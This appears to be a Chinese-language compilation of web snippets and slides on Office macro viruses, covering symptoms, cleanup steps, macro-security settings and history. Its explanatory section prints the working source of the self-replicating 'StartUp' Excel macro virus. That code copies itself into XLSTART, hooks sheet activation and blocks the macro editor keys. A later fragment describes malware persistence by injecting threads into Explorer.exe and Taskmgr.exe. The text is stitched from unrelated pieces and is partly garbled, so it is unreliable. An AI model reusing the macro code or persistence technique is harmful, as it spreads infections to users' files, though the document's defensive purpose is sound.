宏病毒及其防治方法
关于Word宏病毒的处理方法
关于Word宏病毒的处理方法一、W97M.Lexar.B系列病毒现象:1、感染后的电脑,在保存Word文档时会弹出另存为对话框2、或提示在没有启用宏的文档中无法保存文件。
3、或提示文档存在二义性。
4、或发邮件时被退回,或收不到邮件。
5、导致OA编辑正文保存时出错、或保存不了正文、或无法盖章。
二、处理方法(必须严格遵守步骤处理):1、彻底关闭360杀毒。
2、删除“C:\Documents and Settings\(当前用户名)\Application Data\Microsoft\Templates”里面的模板文件。
3、下载最新的360杀毒软件:/indexbeta.html,安装并启动OFFICE病毒免疫。
三、具体处理步骤:1、关闭所有OFFICE文件。
2、显示隐藏的操作系统保护文件第一步:打开C盘选择“组织”,点击“文件夹和搜索选项”第二步:将隐藏文件选项按上图设置,确定第三步:在C盘找到“Documents and Settings”文件夹3、解除文件夹访问权限a)默认情况下“Documents and Settings”不可访问,需解除其访问权限b)解除步骤:第一步:右击“Documents and Settings”文件夹,选择属性,点击上图“高级”按钮第二步:打开高级安全设置选项卡,点击更改权限第三步:打开“更改高级权限设置”卡,选择图中的“拒绝”项,删除,确定4、进入文件夹逐级进入“C:\Documents and Settings\(当前用户名)\Application Data \Microsoft\Templates”文件夹,如遇到没有权限的文件夹则参照“3.3解除文件股权访问权限方法”解除权限。
5、删除文件夹内的所有文件文件删除后病毒即可删除。
6、启动新下载的360杀毒,下次打开有毒的文件时将会自动杀毒。
宏病毒原理及防范
宏病毒原理及防范一、常见宏病毒1.startup宏病毒宏病毒其实并不神秘,其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建,新建的文件常放在xlsrt文件夹下。
然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。
下面先看看startup宏病毒代码吧,注意红字部分。
Sub auto_open()On Error Resume NextIf ThisWorkbook.Path <> Application.StartupPath AndDir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenApplication.ScreenUpdating = FalseThisWorkbook.Sheets("StartUp").CopyActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")n$ = ActiveWindow.Visible = FalseWorkbooks("StartUp.xls").SaveWorkbooks(n$).Close (False)End IfApplication.OnSheetActivate = "StartUp.xls!cop"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnKey "%{F8}", "StartUp.xls!escape"End SubSub cop()On Error Resume NextIf ActiveWorkbook.Sheets(1).Name <> "StartUp" ThenApplication.ScreenUpdating = Falsen$ = Workbooks("StartUp.xls").Sheets("StartUp").Copybefore:=Worksheets(1)Sheets(n$).SelectEnd IfEnd Sub2.book1病毒book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。
宏病毒
如果您并不希望在文档中包含宏,或者不了解文档的确切来源。例如,文档是作为电子邮件的附件收到的,或是来自网络或不安全的 Internet节点。在这种情况下,为了防止可能发生的病毒传染,打开文档过程中出现宏警告提示时最好选择“取消宏”。
2.制作、变种方便
以往病毒是以二进制的计算机机器码形式出现,而宏病毒则是以人们容易阅读的源代码宏语言WordBasic形式出现,所以编写和修改宏病毒比以往病毒更容易。世界上的宏病毒原型己有几十种,其变种与日俱增,追究其原因还是Word的开放性所致。现在的Word病毒都是用WordBasic语言所写成,大部分Word病毒宏并没有使用Word提供的Execute-Only处理函数处理,它们仍处于可打开阅读修改状态。所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。当然会有“不法之徒”利用掌握的Basic语句简单知识把其中病毒激活条件和破坏条件加以改变,立即就生产出了一种新的宏病毒,甚至比原病毒的危害更加严重。
起源
宏病毒起源 当病毒的先驱者们醉心于他们高超的汇编语言技术和成果时,可能不会想到后继者能以更加简单的手法制造影响力更大的病毒。Word宏病毒就是其中最具有代表性的范例之一。
其实宏病毒的出现并非出乎人们的意料,早在80年代后期就有专家预言过。那时,有些学生就用某些应用程序的宏语言编写病毒。然而,宏病毒与普通病毒不同,它不感染.EXE或.COM文件,而只感染文档文件。宏病毒就像自然界中令人恐惧的龙卷风,对人们正常使用计算机进行学习和工作带来了不可估量的影响,同时也造成了社会财富的巨大浪费。
鉴于绝大多数人都不需要或着不会使用“宏”这个功能,我们可以得出一个相当重要的结论:如果您的OFFICE文档在打开时,系统给出一个宏病毒警告框,那么您应该对这个文档保持高度警惕,它已被感染的几率极大。注意:简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒!
防御、清除Excel宏病毒的方法
防御、清除Excel宏病毒的方法
1、安装Office2007以上版本,如果使用Office2007以下版本的Execl禁用宏的操作与本文档
提供的方法有所区别,并且防御宏病毒的能力没有高版本强,所以推荐升级到Office2007以上版本。
2、禁用宏对宏病毒进行防御(如果使用到宏的功能请按照实际需求进行设置),具体方法
如下:
Excel选项->信任中心->信任中心设置->宏设置->禁用所有宏,并且不通知
3、手工删除Execl启动时自动打开的文件,查看Office安装目录XLSTART目录下是否存在有
文件(例:c:\Program Files\Microsoft Office\Office12\XLSTART\),如果存在文件并经过确认不是使用者设置的在Excle启动时自动打开的文件请将其删除。
4、清除现有文件中的宏病毒,使用专杀工具对所有分区进行扫描(Windows Vista以上版
本需要使用“以管理员身份运行”)。
MacroKiller.zip
如有问题请与信息工程部联系。
关于宏病毒的判断、清除和预防
关于宏病毒的判断、清除和预防关于宏病毒的判断、清除和预防2011年01月15日星期六下午01:09关于宏病毒的判断和预防前两天从EXCEL论坛里下载了一个帖子的附件(当然我认为该帖的发表人也不知道文件里有病毒),没想里面有宏病毒"StartUp.xls"在打开文件时提示,缺少"StartUp.xls"。
因为论坛里有很多附件是包含宏的,为了使用时方便,因此我EXCEL中关于宏安全性设置的是"低"。
没想到造成了大错,在此提醒各位一定要将EXCEL中"工具→宏→安全性→安全级"设置为中,打开文件时要确认该文件是否包含宏。
对于宏病毒的判断:当安全级选为中时,如果一旦发现自己的不包含宏的文件打开时提示该文件包含宏,那么恭喜你已经中招了。
此时一定要注意所有打开的文件(指WORD、EXCEL文件)不要存盘,因为宏病毒只有存盘后才会被感染,如果需要将文件进行保存,建议存储为TXT格式,然后从新进行排版。
一定要将打开的文件作好备份再进行杀毒。
我从昨日中午发现机器里被感染病毒,先后使用了"esetsmartsecurity""瑞星天空网站版""360杀毒软件最新版",但前两个软件均没有查出该病毒。
只有360查了出来并将病毒清除。
注意:在杀毒时不要选择"自动处理扫描出的病毒威胁"因为杀毒软件有可能会直接将文件删除,到时重要文件被删掉可是哭都来不及了,当其查出中毒文件后如是重要文件一定要将其重新存储为TXT格式,也可以使用XP自带的"写字板"(注意不是记事本)将word文件直接打开,并将内容保存下来,然后再交给杀毒软件处理。
这样就能保证文件内容不会丢失了。
excel宏病毒是怎么来的随着Internet在中国的迅速拓展,特别是中国教育和科研计算机网(CERNET)以及商业性的ChinaNet和COMNet的发展,电子邮件同样成为许多网络用户使用的工具,互联的校园网络在促进学校科研教育发展的同时,也非常容易成为网络攻击的对象,特别是在网络建设的初期,网络安全意识和网络防范能力都较为薄弱.据透露,一种新的致命病毒---Hare病毒定于近期"发作".Hare病毒届时将显示HDEuthanasia的信息,然后企图重写计算机硬盘上的全部文件.英国《病毒公报》编辑IanWhalley指出,Hare极为复杂,而且很难查出.它是借Internet传播的,未激活版本已在几个国家发现,其中包括美国.另外一种新病毒属于被称为"宏病毒"的传染病毒家族,宏病毒于一年前首次被发现.这种新病毒称为roux,是首例感染Microsoft公司Excell 电子表格的病毒.Laroux的表现很像目前常见的Word.concept病毒,后者在MicrosoftWord生成的文档中传播.Laroux可做为电子表格的附件进入电子邮件,或以其他同电子表格相同的传送方式传播.据美国全国计算机安全协会(NCSA)称,这种病毒相对来说没有什么危害,但可导致少数系统的"应用软件异常".NCSA指出,Laroux看上去比Word.concept传播的速度要慢,因为Excel不像Word使用那么广泛,而且用户不常共用电子表格,而文字处理器文档则经常共用.去年,用户经受的宏病毒猛增了5倍,安全专家把这主要归结为一个因素--电子邮件的迅速增加。
office如何有效预防宏病毒
Office如何有效预防宏病毒简介宏病毒是一种利用Microsoft Office软件中的宏功能传播的恶意软件。
宏病毒可以通过恶意宏代码来执行各种破坏行为,如破坏、删除或篡改文件。
在工作环境中,使用Microsoft Office软件是不可避免的。
然而,有效预防宏病毒的传播变得尤为重要。
本文将介绍一些有效的预防宏病毒的方法,帮助您保护您的数据和计算机安全。
方法一:启用安全设置Microsoft Office软件提供了一些内置的安全设置,可以帮助有效预防宏病毒的传播。
以下是一些重要的安全设置:1. 禁用自动宏运行默认情况下,Office软件启用自动宏运行。
禁用自动宏运行可以防止恶意宏在打开文档时自动执行。
要禁用自动宏运行,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“宏设置”中,选择“禁用所有宏,并禁用通知”选项。
2. 禁用宏如果您不需要使用宏功能,禁用宏是一种有效的预防宏病毒的办法。
要禁用宏,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“宏设置”中,选择“不允许任何宏运行”选项。
3. 启用受信任的位置有时,您可能需要运行特定的宏或从受信任的位置打开文档。
为了更好地控制宏的运行,可以将受信任的位置添加到Office软件的信任中心。
要启用受信任的位置,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“受信任的位置”中,点击“添加新位置”按钮。
方法二:保持软件升级定期升级Microsoft Office软件是预防宏病毒的另一个重要步骤。
每个Office升级都包含了最新的安全补丁和修复程序,可以提供额外的安全保障。
要确保软件始终保持最新状态,可以按照以下步骤操作:•打开Office软件,点击“文件”菜单。
宏病毒的查杀与防治
3
宏病毒的概念
什么是“宏”
宏就是一组计算机指令--可以将它们录制下
来,并将它们与快捷键组合或宏名称关联起来。
然后,在按下快捷键组合或单击宏名称时,计算
机程序就会执行宏的指令。
4
宏病毒的概念
“宏”在哪里?
我们工作当中,离不开各种文档、表格。比如 微软公司出品的办公软件office2003。当中有 word文档、有excel文档等等。这些高度智能化的 办公软件当中,有很多可以把复杂的反复操作简单 化的指令合集。这种合集可以是自己录制的,也可 以是网络下载的。这就是“宏”
14
宏病毒的查杀及预防
1、提高对宏病毒的警惕性 在office办公软件当中,在 工具—宏—安全性 选项当中把宏安全性设置为 高。 2、时刻保持杀毒软件的正常运行 把杀毒软件的更新设置为自动更新,打开杀毒软 件所有的杀毒选项 3、不要随意打开不明电子邮件 宏病毒寄存在文档当中,通过邮件及U盘拷贝等形 式传播。在收到不明来历的电子邮件,马上删除。例 如:邮件标题为人才调查、人才招聘、财务报表、公 司计划等不明来历具有诱惑性的邮件
5
宏病毒的概念
宏病毒的起源
宏病毒在上个世纪90年代得益于网络及电子邮件 的发展而广泛传播。宏病毒主要感染文件有 word、 Excel 的文档。并且会驻留在系统内存上。因为这种 病毒活动特征区别于电脑病毒,所以一般的杀毒软件 不会报警。只有在用户打开及保存以上两种文档时感 染文件。
6
宏病毒的识别
在杀毒过程中不要选择自动处理,因为这很可能 会把你的染毒文件直接删除。
查找出来的染毒文件如果是重要文档,先用系统
自带的写字板工具打开,保存内容后再清除病毒。 确保重要文档不丢失。
电脑宏病毒
电脑宏病毒宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
下面由店铺带你走进宏病毒中!让你充分的了解宏病毒!谢谢!宏病毒:一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。
从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
如果某个文档中包含了宏病毒,我们称此文档感染了宏病毒;如果WORD系统中的模板包含了宏病毒,我们称WORD系统感染了宏病毒。
来源虽然OFFICE97/Word97无法扫描软盘、硬盘或网络驱动器上的宏病毒。
但当打开一个含有可能携带病毒的宏的文档时,它能够显示宏警告信息。
并且在2013年后的杀毒软件已支持宏病毒扫描。
这样就可选择打开文档时是否要包含宏,如果希望文档包含要用到的宏(例如,单位所用的定货窗体),打开文档时就包含宏。
如果您并不希望在文档中包含宏,或者不了解文档的确切来源。
例如,文档是作为电子邮件的附件收到的,或是来自网络或不安全的Internet节点。
在这种情况下,为了防止可能发生的病毒传染,打开文档过程中出现宏警告提示时最好选择“取消宏”。
OFFICE97软件包安装后,系统中包含有关于宏病毒防护的选项,其默认状态是允许“宏病毒保护”复选框。
如果愿意,您可以终止系统对文档宏病毒的检查。
当Word显示宏病毒警告信息时,清除“在打开带有宏或自定义内容的文档时提问”复选框。
或者关闭宏检查:单击“工具”菜单中的“选项”命令,再单击“常规”选项卡,然后清除“宏病毒保护”复选框。
不过我强烈建议您不要取消宏病毒防护功能,否则您会失去这道防护宏病毒的天然屏障。
上世纪90年代的宏病毒主要感染文件有word、Excel 的文档。
并且会驻留在Normal面板上据统计,通过Internet传播的不同类型的病毒数量如下:DOS型: 10000至11000种Windows型:12种Macintosh型:35种宏病毒: 200余种Unix型: 6种其中10000-11000种DOS型病毒能感染所有DOS、Windows95平台的计算机(但不感染Macintosh计算机);但200余种宏病毒中的大部分能感染所有计算机,包括PC机和Macintosh机。
预防和清除宏病毒的方法
预防和清除宏病毒的方法摘要:宏是WORD中避免一再的重复相同的动作而设计出来的一种工具,宏病毒就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。
本文首先分析宏病毒的特性,并就如何检测、清除及预防进行了探讨。
关键词:宏病毒;WORD;预防;清除Abstract: The macro is a tool designed to avoid repeated the same action in the WORD, and a macro virus is the copy and infectious macro using the software to support macros written. This paper first analyzes the characteristics of macro virus, and discusses on how to detect, removal and prevent it.Key words: macro virus; WORD; prevention; clear所谓宏病毒,就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。
宏病毒是一种新形态的计算机病毒,也是一种跨平台式计算机病毒。
1.宏病毒的工作原理在用W O R D 处理文档时,需要同时进行各种不同的动作,每一种动作其实都对应着特定的宏命令。
宏病毒的感染过程和破坏行为与WORD 的文件宏程序的操作密切相关,这些宏程序可能就是宏病毒的插入点。
病毒包含在宏中时,只要染毒的文件被打开,病毒的宏程序就可能会被执行,进而取得系统控制权,进行感染和破坏。
为了能广泛地传播,宏病毒大都采用感染通用模版NORMAL.DOT 的方法将自己复制到其他文档中去。
W O R D启动时总是自动打开通用模版,这就为宏病毒在每次启动WORD 时能够取得系统控制权提供了机会。
含有自动宏的染毒文档,当被其他计算机的WORD 打开时,也会自动感染该计算机。
宏病毒防治
宏是Word 里一个非常有用的工具,但也是Word 的安全漏洞之一。
有一些恶意的人利用宏制造宏病毒,给别人带来麻烦。
宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
一旦打开这样的文档,宏病毒就会被激活,转移到计算机上,并驻留在Normal 模板上。
从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
13.1 宏病毒宏病毒已经成为发展最快和传播最迅速的病毒。
美国国际计算机安全协会ICSA 的《ICSA 1998 病毒流行调查报告》表明宏病毒独占1998 年十大病毒感染事件的72%,在十大病毒中占了五席交椅:WM/Concept、WM/Cap、WM/Wazzu、WM/Npad 和XM/Laroux。
根据DataFellow 公司每天特征码升级的F-Macro 所检测到的宏病毒数目,至1998 年12 月达到了3,332 个,而在1997 年12 月才是1,821个,增长率为83.0%。
而且F-Macro 并不能检测到所有宏病毒。
在1998 年12 月出现了Word Class Object 的宏病毒,是由VicodinES编写的。
13.1.1 宏病毒许多应用程序都允许在用户的数据库中包含一些宏,随着应用软件的进步,宏语言的功能也越来越强大,其中微软的Word VisualBasic for Application(VBA)已经成为应用软件宏语言的标准。
利用宏语言,可以实现几乎所有的操作,还可以实现一些应用软件原来没有的功能。
每个模板或数据文件中,都可以包含宏命令。
有不少应用软件允许用户利用宏修改软件菜单的功能,并可以将某一个宏加入到菜单中或设置成自动运行的命令。
利用这个功能,宏就可以修改软件本身的功能,从而将软件本身修改为病毒传播的源泉。
宏病毒就是利用Word VBA 进行编写的一些宏,这些宏可以自动运行,干扰用户工作,轻则降低工作效率,重则破坏文件,使用户遭受巨大损失。
宏病毒的名词解释
宏病毒的名词解释宏病毒,即宏命令病毒,是一种针对办公软件和应用程序的恶意软件。
它利用了宏语言的功能,通过嵌入恶意代码来感染和破坏文件。
宏病毒的破坏性广泛存在于Word、Excel等办公软件中,曾经对计算机安全构成严重威胁。
一、宏病毒的传播方式宏病毒多以邮件附件的形式传播。
黑客通过电子邮件发送带有嵌入宏病毒的文档,一旦用户点击或打开,宏病毒就开始在用户计算机上执行恶意操作。
宏病毒还可以通过文件共享、网络下载和可移动存储介质等方式传播。
二、宏病毒的感染和破坏宏病毒主要感染和破坏办公文档文件,如Word、Excel、PowerPoint等。
它利用文档应用程序内置的宏语言功能,如VBA(Visual Basic for Applications),使恶意代码得以在打开文档的同时运行。
宏病毒可以操纵整个文档,执行恶意操作,如删除、篡改内容、复制自身并传播到其他文档。
宏病毒的破坏性可分为明显和隐蔽两种形式。
明显的病毒会立即显示出破坏行为,如删除文件、关闭程序等。
而隐蔽的病毒则更加隐蔽,它会在后台默默地进行操作,窃取用户信息、传播到其他文档或网络上。
三、预防宏病毒的措施为了保护计算机和个人信息的安全,我们需要采取一系列预防措施来防止宏病毒的感染和破坏。
1. 注意邮件和文件来源:不打开来自陌生人或不可信来源的邮件和文件,尤其是带有宏功能的文档。
2. 更新安全软件:定期更新防病毒软件和操作系统,以获取最新的病毒定义和安全补丁。
3. 禁用宏:对于非必要的宏功能,建议禁用或设置为仅在受信任的文件中启用。
4. 建立安全意识:提高员工对宏病毒的认知,教育他们不轻易点击或打开可疑附件,注意安全使用办公软件。
5. 备份重要文件:定期备份关键文件,以防止突发病毒感染或数据丢失。
四、应对宏病毒的解决方法如果不幸遭受宏病毒感染,我们需要及时采取相应的解决方法来处理病毒。
1. 断开网络连接:迅速断开计算机与网络的连接,以防止病毒通过网络传播和进一步破坏。
「EXCEL宏病毒处理方法」
Excel宏病毒(BOOK1病毒)处理方法症状:第一次打开带病毒的EXCEL文档时,会提示“是否启用宏”对话框,以后每次打开EXCEL 文档时就会自动弹出一个Book1文档。
传播途径:主要以发送邮件或使用U盘时,接收了带病毒的EXCEL文档。
处理步骤:1、首先进行病毒查杀:使用360杀毒软件或瑞星杀毒软件查杀;2然后将病毒源进删除:在C:\Program Files\Microsoft Office\OFFICE11\xlstart\下,然后将book1文件删除。
查毒方式:主要有360杀毒软件和瑞星杀毒软件两种,这里详细介绍瑞星杀毒软件的安装和使用方法。
StartUp.xls宏病毒清除方法及步骤StartUp.xls宏病毒的现象:ﻫ1.打开excel文件时提示有宏2.文件不能直接保存,只能另存3.打开excel文件时,点击"窗口"->"取消隐藏",会打开一个Startup.xls文件ﻫStartUp.xls宏病毒清除方法及步骤:(excel宏病毒)第一步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls;(注意:其中有些事隐藏文件,你看不到,按照下面说的做就可以看到那些隐藏文件:打开我的电脑》》工具》》文件夹选项》》“隐藏受保护的操作系统文件(推荐)”前面的勾打掉》》选中“显示隐藏的文件、文件夹和驱动器”》》去掉“隐藏已知文件类型的扩展名”的勾。
)第二步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\的Excel11.exe(约236K)及Excel11.xlb等名字中带有Excel11的文件。
(删除后Excel程序会自动创建部分文件)第三步:下载startup.xls并放入“C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\”。
Excel宏病毒的应对方法
Excel宏病毒的应对方法
电脑中了Excel宏病毒,很多Excel文档无法打开或无法正常找开,上网查询后下载专杀毒软件杀毒后发现宏病毒已经清除,重启后病毒还在。
经过试验处理了几台中毒的电脑,总结方法如下以供参考。
1、最简单的方法
第一步进入删除Office 应用程序控制面板---添加或删除程序
----Microsoft Office Professional Edition 2003—----删除
第二步安装Office软件下载简化版或完全版安装到电脑中即可
第三步关闭网络拔掉网络线或进入“网上领居”属性----“本地连接”----停用
第四步打开中毒的Excel文件在弹出对话框中选择“禁用宏”,然后全选内容-----复制,新建文件----粘贴(刚才所复制的内容)-----保存文件。
第五步重复第四步完成所有打不开的Excel文件的处理工作
第六步重开网络插入网络线或进入“网上领居”属性----“本地连接”----启用
完成
2、重装系统方法安装好系统和office 软件,执行第一种方法中的第二步至第六步即可
所有的事后处理都是亡羊补牢,我们应该平时养成防范意识,安装杀毒软件并经常更新和检查磁盘,对来历不明的U盘和光碟要慎用,特别不要关闭防火墙等杀毒软件给病毒入侵有可乘之机,让自己的电脑安全正常工作。
宏病毒清除操作手册
宏病毒清除操作手册摘要:宏病毒是一种常见的计算机病毒,它利用办公软件中的宏功能进行传播和感染。
本文档旨在为用户提供一份清除宏病毒的操作手册,包含如何识别宏病毒、清除感染文件以及预防宏病毒传播的方法等。
通过遵循本手册中的操作指引,用户可以及时有效地清除宏病毒,提高计算机系统的安全性和稳定性。
1. 简介宏病毒是一种利用办公软件(如Microsoft Office)中的宏功能进行传播和感染的计算机病毒。
它通常存在于Office文档(如Word 文档、Excel文件等)中,并且可以通过下载、打开或共享这些文件来传播。
一旦感染,宏病毒可能对计算机系统和文件造成损害,甚至可能导致数据丢失和系统崩溃。
2. 识别宏病毒在清除宏病毒之前,首先需要能够准确识别它们。
以下是一些常见的识别方法:a. 注意文件扩展名:宏病毒通常会将文件扩展名更改为“.docm”、“.xlsm”等,以启用宏功能。
b. 观察异常行为:如果文档在打开后自动执行某些操作或显示不寻常的行为,很可能是宏病毒的迹象。
c. 启用安全模式:通过将办公软件启动到安全模式,可以禁用宏并防止其执行。
3. 清除宏病毒一旦确定文件被宏病毒感染,请按照以下步骤清除它:a. 先暂时关闭宏:打开Office软件,前往“选项”>“信任中心”>“信任中心设置”,在“宏设置”中选择“禁用所有宏”选项。
b. 打开感染文件:用Office软件打开感染文件,进入“开发人员”选项卡,点击“宏”按钮。
c. 删除宏代码:在弹出的“宏”窗口中,选中所有宏代码,点击“删除”按钮,然后关闭文件并不保存修改。
d. 执行杀毒扫描:使用可靠的杀毒软件对计算机进行全面扫描以确保宏病毒已清除。
4. 防止宏病毒传播除了及时清除感染文件外,预防宏病毒的传播也是非常重要的。
下面是一些建议:a. 更新办公软件:始终确保您使用的办公软件是最新版本,并及时安装官方提供的安全补丁和更新。
b. 禁用宏功能:如果您在日常工作中不需要使用宏功能,可以将其禁用,从根本上减少宏病毒的风险。
遇到宏病毒怎么办
遭遇Word宏病毒怎么办word好用,宏病毒可怕,笔者在多次遭遇word宏病毒之后,终于摸索出一个自力更生,手工解决word宏病毒的简单、应急方法,成功率100%(适用于Word97、Word2000)。
一、常见现象描述现象1:使用word过程中,在进行打开、保存或关闭文档操作时,提示诸如“对象不存在”.之类的错误信息(这是宏病毒没编好,造成的执行错误),并出现一个调试窗口,可以看到一行行代码(这些代码就是宏病毒的“身体”——VBA语言编写)导致正常的文档编辑工作无法进行,文档无法保存。
…现象2:进行正常操作时,忽然出现各种莫名其妙的对话窗口,比如,突然蹦出个对话框,提示让你输入一句话,还常带有一些俏皮话。
现象3:没有进行任何关闭操作的前提下,正在编辑的文档自动关闭,或者word自动关闭。
现象4:正常使用word时,常常突然出现提示Word非法操作,文档来不及保存。
二、检查宏病毒当怀疑有宏病毒时,可以通过以下方法确认宏病毒的存在:方法1:选择[工具]/[宏]/[宏],如果出现对话框,对话框中有诸如AutoOpen、Autoclose、DocumentOpen、Documentsave、DocumentClose之类的宏名,无法确认其来源,可以认为是宏病毒。
方法2:选择[工具]/[宏]/[宏]、[录制新宏]、[visual Basic编辑器]菜单项,如果没有任何反应,可以确认宏病毒存在;同样,选择[选项]菜单项,[选项]对话框并不出现,可以确认宏病毒。
方法3,:打开[工具]菜单,发现其中的[宏]和[选项]菜单项“消失”了,而且没有人为的自定义过菜单,这就应该是宏病毒为保护自己不被发现、不被预防而设置的障碍。
三、解决办法应该相信,一切word宏病毒都是纸老虎。
这是因为:1.宏病毒用解释性语言VBA编写,需要word对宏病毒解释,宏病毒才能运行;2.宏病毒的自我复制,需要利用Word的通用模板文件(NOM6JLL.DOT)作为中介;3.word本身有预防宏病毒的功能。
三招防范宏病毒
三招防范宏病毒由于宏病毒经常在办公软件Office中出现,给广大用户造成不小的损失。
笔者发现,通过以下三招可以远离宏病毒(以Word为例)。
第一招:设置宏安全级别打开Word,选择“工具选项安全性宏安全性”命令,这样就打开了宏的安全级别属性设置选项,将安全级别由默认的“高”修改为“非常高”,最后单击“确定”即可。
这样可以防止除Word默认的宏以外的其他宏运行。
第二招:运行宏病毒自动提示打开Word,选择“工具选项安全性宏安全性”命令,单击“可靠发行商”标签,取消选择“信任所有安装的加载项和模板”复选框,然后单击“确定”即可。
这样当打开含有宏的Word文档时,就会提示宏已被禁止。
当然,也可能让正常的宏使用受到限制。
第三招:卸载VBA彻底预防宏病毒VBA全称是Visual Basic for Application,它是Microsoft Visual Basic的宏语言版本。
用于Windows应用程序的宏。
是Word中宏的支持工具包,一旦禁用此包,一些自定义模板和所有的宏将不可用。
具体方法:双击“控制面板”中的“添加/删除程序”图标,找到Microsoft Office的安装项,单击“更改”按钮,选择“添加或删除功能”选项后,单击“下一步”按钮,在弹出来的窗口选“选择应用程序的高级自定义”复选框,再单击“下一步”按钮,这样,就可以选择删除该工具包。
在打开的Office程序及附加内容和工具中单击“Office共享功能“前的加号,找到“Visual Basic for Application”,单击前面的驱动器图标,选择“不安装”按钮即可。
经过以上三招,宏病毒将会远离你的Office了,这里是以Word为例介绍的,其实对Excel 也同样适用,不妨一试。
、只要运行注册表就可以啦!具体做法:在“开始”里找到“运行”按纽,点击后在“打开”栏里输入“regedit”,就可以打开注册表了;找到HKEY_LOCAL_MACHINE打开,找SOFTWARE打开,找Microsoft打开,找office 打开,找11.0打开,找EXCEL打开,找security打开后看到它旁边的窗口有一项名称为LEVEL 的,双击它,在跳出的编辑DWORD值里面看到数值数据(V):下面的空格啦,你就可以在里面修改数值啦。
如何预防和消除宏病毒
怎么样预防和消除宏病毒才是最好的Word宏病毒是一种用专门的Basic语言即Word Basic 编写的程序。
与其它计算机病毒一样,它能对用户系统中的可执行文件和数据、文本类文件造成破坏。
Word中提供由用户编制宏这一功能是为了让用户能够用简单的程序,简化一些经常重复性的操作,与DOS中的批处理文件类似。
Word宏的编制技术,与其它复杂的编程技术相比,要求很低很容易编制,这就为心怀恶意的计算机用户提供了一种简单高效的制造病毒手段。
但也正因其编制简单,使宏病毒的防治远较那些用复杂的编程语言编制的病毒容易得多。
下面就谈在日常用Word处理文本时,如何预防和消除宏病毒。
Word宏病毒的触发条件是在启动或调用Word文档时,自动触发执行,因此,只要不打开被感染的文本,宏病毒是不会传播的。
如果打开了带毒的文本,其它没打开的文本不会被感染;即使是打开了其它文本,只要不存盘,也不会感染到硬盘中的文本。
我们知道,Word本身不带病毒,即初次进入Word环境时没有病毒,一旦在其中打开带宏病毒的文件,病毒就会留在Word环境中,如果这时打开其它文件,这些文件就会被感染;更严重的是,关闭Word时的环境就带上了宏病毒,而这时处理的所有文档都将感染上宏病毒。
宏病毒入侵有两条路径,一是E-mail,二是软盘,其共同特点是只能通过word格式(文件后缀为dos或rtf)传播。
只要不用word格式存盘,而用txt 格式,宏病毒就无从存活了。
因此,为了防止宏病毒通过软盘流传,我们在交换软盘时,可要求对方用TXT格式传交文件,或者先用Window提供的书写器(对window3.X而言),或写字板(对Window而言)打开外来的word文档,将其先转换成书器或写字板格式的文件并不保存后,再用word调用。
因为书写器或写字板是不调用也不记录和保存任何Word宏的,文档经此转换,所有附带其上的宏都将丢失,当然,这样做将使该Word文档中所有的排版格式一并丢失。
宏病毒 病毒的自我保护 防御办法
2. 虚拟执行技术
技术通过虚拟执行方法查杀病毒,可以对付加密、变形、 异型及病毒生产机生产的病毒,具有如下特点: 在查杀病毒时在机器虚拟内存中模拟出一个“指令执行虚 拟机器” 在虚拟机环境中虚拟执行(不会被实际执行)可疑带毒文 件 在执行过程中,从虚拟机环境内截获文件数据,如果含有 可疑病毒代码,则杀毒后将其还原到原文件中,从而实现 对各类可执行文件内病毒的查杀
工具菜单中的选项宏病毒防范?通过disableautomacros宏指令来禁止使用自动宏subautoexecwordbasicdisableautomacrostrueendsub病毒的自我保护病毒的自我保护手段?反静态反汇编技术?数据的压缩与数据加密病毒的自我保护手段续?反静态逆向工程技术?干扰代码技术向设备的偏移量为100h处进行写操作病毒的自我保护手段续?多态变形技术?病毒程序的设计者为了使病毒代码躲避扫描程序的监察不断对自身的执行代码进行变换尽量隐藏扫描程序依据的病毒特征代码从而使得扫描程序无法正确侦测和清除该病毒
பைடு நூலகம்
两个辅助线程相互实时监视,如果监视对象被关闭了,就重新 创建线程或进程。其实,在程序中选择的远程进程驻体为 Explorer.exe和Taskmgr.exe。在通常情况下,如果用户知道 了远程线程的驻体为资源管理器后,就会打开任务管理器来结 束Explorer,这时再把 为资源管理器后,就会打开任务管理器 来结束 p ,这时再把远程线程驻入到任务管理器中。也就是说, 只要Explorer或Taskmgr有一个存在,就不可能结束主进程。 如果有其他Kill进程的工具,你就可以将其关闭掉,只要资源 管理器和任务管理器均不存在时,就没有驻体来维持远程进程。 不过,如果我们选择的远程进程为随机的,这就不容易发现了; 如果我们选择的远程进程为系统文件(如smss.exe会话管理 器),那么你是不会安全的结束远程线程,除非系统崩溃。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
宏病毒及其防治方法探析
